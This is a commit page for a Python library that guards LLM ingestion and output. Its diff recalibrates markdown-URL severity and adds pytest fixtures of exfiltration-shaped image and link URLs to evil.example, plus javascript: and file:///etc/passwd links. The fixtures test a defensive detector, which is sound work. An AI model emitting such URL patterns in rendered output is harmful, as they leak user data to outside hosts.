fix(calibration): grade active content on URL shape, not construct type
v0.3.0 made the untrusted upload path unusable: measured on both doors, an ordinary remote image fail_secure'd and an ordinary link/autolink/refdef quarantined, so only documents without external references persisted. Two independent defects compounded; neither fix works alone: 1. `markdown-image: HIGH` fired on any external image. The exfil primitive is a URL that moves bytes outward, not an image. `is_ordinary_url` now grades on shape - http(s)/protocol-relative, no query, no userinfo, no percent-escape, no opaque host label or path segment -> LOW; anything data-carrying keeps the carrier's severity. raw-html and data: URIs stay HIGH unconditionally. Opacity reuses entropy's primitives; floors calibrated against real doc URLs (worst legit token H=4.08, exfil segments 4.36-4.54) and frozen in calibration. 2. The quarantine_default floor fired on ANY finding, a premise that broke when every ordinary link became a finding. It now fires at MEDIUM+ - a no-op for every detector that shipped before 0.3.0 (no LOW/INFO exists), which is what makes this a patch rather than a minor. The corpus blind spot that let this pass 522 green tests is closed: the FP corpus carries realistic markdown and is asserted on the OUTPUT gate under PRESET_USER_UPLOAD, with a counter-corpus of exfil-shaped URLs that must still block. Beaconing and short opaque segments are conceded in LIMITATIONS and asserted by the coverage matrix rather than papered over. No new public API; no new preset (0.4.0 work); allow_reserved default unchanged.
This commit is contained in:
parent
da7421e6c8
commit
6e9b8168e3
13 changed files with 533 additions and 46 deletions
|
|
@ -16,6 +16,8 @@ wiki content (design principle 5: over-blocking is a failure mode).
|
|||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import pytest
|
||||
|
||||
from llm_ingestion_guard import (
|
||||
scan_active_content,
|
||||
scan_output,
|
||||
|
|
@ -62,7 +64,9 @@ def test_okf_import_flags_body_echoleak():
|
|||
# --- each active-content class surfaces as a finding -------------------------
|
||||
|
||||
def test_inline_link_is_reported_medium():
|
||||
report = scan_active_content("click [here](https://evil.example/go) now")
|
||||
# Click-required carrier -> MEDIUM when the URL can carry a value outward.
|
||||
# (The ordinary form of the same construct is LOW; see the shape tests.)
|
||||
report = scan_active_content("click [here](https://evil.example/go?d=account) now")
|
||||
link = [f for f in report.findings if f.label == "active:markdown-link"]
|
||||
assert len(link) == 1
|
||||
assert link[0].severity is Severity.MEDIUM
|
||||
|
|
@ -128,6 +132,97 @@ def test_benign_formatting_html_is_not_flagged():
|
|||
assert report.found is False
|
||||
|
||||
|
||||
# --- URL shape: severity tracks what the URL can CARRY (0.3.1) ---------------
|
||||
# 0.3.0 graded on construct type, so ``
|
||||
# — a URL that carries nothing outward — was HIGH and fail-secured every ordinary
|
||||
# document on the upload preset. Severity now grades on URL *shape*: an ordinary
|
||||
# external URL (bare path, no query, no opaque segment) is LOW; a URL that can
|
||||
# move bytes outward keeps the carrier's full severity.
|
||||
|
||||
_ORDINARY = [
|
||||
("image", "", "active:markdown-image"),
|
||||
("link", "See [the guide](https://learn.microsoft.com/en-us/azure/overview).", "active:markdown-link"),
|
||||
("autolink", "Spec: <https://example.com/spec/v2>", "active:autolink"),
|
||||
("refdef", "[guide]: https://example.com/docs/deployment-guide", "active:reference-link"),
|
||||
]
|
||||
|
||||
|
||||
@pytest.mark.parametrize("cid,text,label", _ORDINARY, ids=[c[0] for c in _ORDINARY])
|
||||
def test_ordinary_external_url_is_low(cid, text, label):
|
||||
finding = [f for f in scan_active_content(text).findings if f.label == label]
|
||||
assert len(finding) == 1, f"{cid}: {label} not reported at all"
|
||||
assert finding[0].severity is Severity.LOW, f"{cid}: {finding[0].severity}"
|
||||
|
||||
|
||||
_EXFIL_SHAPED_URLS = [
|
||||
("query-carries-value", "https://evil.example/collect?d=account-identifier"),
|
||||
("base64-path-segment", "https://evil.example/c3RvbGVuIHNlc3Npb24gdG9rZW4gdmFsdWU/p.png"),
|
||||
("hex-id-path-segment", "https://evil.example/d41d8cd98f00b204e9800998ecf8427e/p.png"),
|
||||
("percent-encoded-path", "https://evil.example/p/%73%65%63%72%65%74%76%61%6c%75%65"),
|
||||
("opaque-subdomain", "https://c3RvbGVuIHNlc3Npb24gdG9rZW4gdmFsdWU.evil.example/p.png"),
|
||||
("userinfo-authority", "https://token:s3cr3tvalue@evil.example/p.png"),
|
||||
]
|
||||
|
||||
|
||||
@pytest.mark.parametrize("cid,url", _EXFIL_SHAPED_URLS, ids=[c[0] for c in _EXFIL_SHAPED_URLS])
|
||||
def test_exfil_shaped_image_keeps_high(cid, url):
|
||||
finding = [f for f in scan_active_content(f"").findings
|
||||
if f.label == "active:markdown-image"]
|
||||
assert len(finding) == 1, f"{cid}: image not reported"
|
||||
assert finding[0].severity is Severity.HIGH, f"{cid}: downgraded to {finding[0].severity}"
|
||||
|
||||
|
||||
@pytest.mark.parametrize("cid,url", _EXFIL_SHAPED_URLS, ids=[c[0] for c in _EXFIL_SHAPED_URLS])
|
||||
def test_exfil_shaped_link_keeps_medium(cid, url):
|
||||
finding = [f for f in scan_active_content(f"[x]({url})").findings
|
||||
if f.label == "active:markdown-link"]
|
||||
assert len(finding) == 1, f"{cid}: link not reported"
|
||||
assert finding[0].severity is Severity.MEDIUM, f"{cid}: downgraded to {finding[0].severity}"
|
||||
|
||||
|
||||
def test_fragment_is_not_treated_as_carrying():
|
||||
# A fragment never reaches the server, so it cannot carry data to the host a
|
||||
# renderer auto-fetches — and `…/overview#section` is the most common shape
|
||||
# in real documentation. The link-click nuance (an attacker page's JS *can*
|
||||
# read location.hash) is a documented residual, not a severity here.
|
||||
finding = [f for f in scan_active_content(
|
||||
"[prereqs](https://learn.microsoft.com/en-us/azure/overview#prerequisites)"
|
||||
).findings if f.label == "active:markdown-link"]
|
||||
assert finding and finding[0].severity is Severity.LOW
|
||||
|
||||
|
||||
def test_non_http_scheme_is_never_ordinary():
|
||||
# Only http(s) and protocol-relative URLs have an "ordinary" form. Anything
|
||||
# else (javascript:, ftp:, file:, ...) keeps the carrier's full severity
|
||||
# whatever its path looks like.
|
||||
for url in ("javascript:alert(1)", "ftp://example.com/pub/file.txt", "file:///etc/passwd"):
|
||||
finding = [f for f in scan_active_content(f"[x]({url})").findings
|
||||
if f.label == "active:markdown-link"]
|
||||
assert finding and finding[0].severity is Severity.MEDIUM, url
|
||||
|
||||
|
||||
def test_raw_html_and_data_uri_stay_high_regardless_of_url_shape():
|
||||
# These are active whatever the URL carries: a raw <img> is fetched by the
|
||||
# renderer and a data: URI executes its own payload. No ordinary form exists.
|
||||
html = [f for f in scan_active_content('<img src="https://example.com/logo.png">').findings
|
||||
if f.label == "active:raw-html"]
|
||||
assert html and html[0].severity is Severity.HIGH
|
||||
data = [f for f in scan_active_content("see data:text/plain,hello here").findings
|
||||
if f.label == "active:data-uri"]
|
||||
assert data and data[0].severity is Severity.HIGH
|
||||
|
||||
|
||||
def test_worst_url_in_a_class_sets_severity_and_evidence():
|
||||
# An exfil URL hidden behind an ordinary one must not be masked by first-hit
|
||||
# evidence: the class reports the WORST member, with that member's evidence.
|
||||
text = (" "
|
||||
"")
|
||||
img = [f for f in scan_active_content(text).findings if f.label == "active:markdown-image"][0]
|
||||
assert img.severity is Severity.HIGH
|
||||
assert img.count == 2
|
||||
assert "evil" in (img.evidence or ""), img.evidence
|
||||
|
||||
|
||||
# --- counting and evidence hygiene -------------------------------------------
|
||||
|
||||
def test_image_is_not_double_counted_as_link():
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue